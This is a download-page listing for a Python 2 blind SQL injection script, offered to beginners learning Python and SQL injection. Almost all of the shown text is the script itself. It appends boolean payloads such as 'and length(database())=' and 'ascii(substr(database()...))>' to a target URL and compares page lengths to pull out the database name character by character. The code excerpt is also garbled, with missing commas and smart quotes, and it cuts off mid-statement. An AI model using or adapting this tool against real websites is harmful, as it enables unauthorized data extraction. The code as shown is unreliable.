• 大小: 18KB
    文件类型: .py
    金币: 2
    下载: 1 次
    发布日期: 2021-06-18
  • 语言: Python
  • 标签: python  sql注入  

资源简介

适合刚学python和sql注入的人 import urllib2 import re

资源截图

代码片段和文件信息

# -*-coding:gbk-*-
import urllib2
import re

url=raw_input(“网址:“)

def getpage(url):

    req = urllib2.Request(url)

    res = urllib2.urlopen(req)

    page = res.read()
    return len(page)

sureLen = getpage(url)

def getdblen(urlsureLen):
    i = 0
    while 1:
        i = i + 1
        lenurl = url + “+and+length(database())=“ + str(i) + “+--+“
        pageLen = getpage(lenurl)
        if sureLen == pageLen:
            return i

dblen = getdblen(urlsureLen)

print “dbname length is :“dblen
ls = “aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!‘#$%&‘()*+-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_‘abcdefghijklmnopqrstuvwxyz{|}~“

def getdbname(urllssureLendblen):
    
    dbName = ““
    for i in range(1dblen+1):
        j = 96
        k = 128
        fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
        print fullUrl
        pageLen = getpage(fullUrl)
        if sureLen == pageLen:
            j = 111
            fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
            print fullUrl
            pageLen = getpage(fullUrl)
            if sureLen == pageLen:
                j = 119
                fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
                print fullUrl
                pageLen = getpage(fullUrl)
                if sureLen == pageLen:
                    j = 123
                    fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
                    print fullUrl
                    pageLen = getpage(fullUrl)
                    if sureLen == pageLen:
                        j = 125
                        fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
                        print fullUrl
                        pageLen = getpage(fullUrl)
                        if sureLen == pageLen:
                            for u in range(126127):
                                fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))=“+str(u)+“--+“
                                print fullUrl
                                pageLen = getpage(fullUrl)
                                if sureLen == pageLen:
                                    dbName += ls[u]
                                    break
                                
                            
                        else:
                            for u in range(124126):
                                fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))=“+str(u)+“--+“
                                print fullUrl
                                pageLen = getpage(fullUrl)
                                if sureLen == pageLen:
                                    dbName += ls[u]
                                    break
                    else:
                        j = 121
                        fullUrl=url + “+and+ascii(substr(database()“

评论

共有 条评论